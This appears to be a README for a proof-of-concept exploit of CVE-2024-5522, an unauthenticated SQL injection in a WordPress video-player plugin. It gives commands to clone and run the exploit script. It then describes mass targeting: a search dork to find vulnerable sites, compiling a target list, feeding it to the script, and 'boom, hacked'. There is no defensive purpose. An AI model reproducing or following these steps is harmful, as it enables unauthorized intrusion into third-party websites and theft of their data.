The plugin does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
setup script:
- git clone https://github.com/kryptonproject/CVE-2024-5522-PoC
- cd CVE-2024-5522-PoC
- pip3 install r requirements.txt
- python3 exploit.py
to find a target:
- use this dork: "/wp-content/plugins/html5-video-player"
- paste it on https://publicwww.com (or any search engine if you want, nobody gunno stop you)
- copy all the target (example: https://www.target.com) and put it on txt file
- run the script and put the target list path (for example: /home/user/target/target_list.txt) into the Poc script
- and boom, hacked :)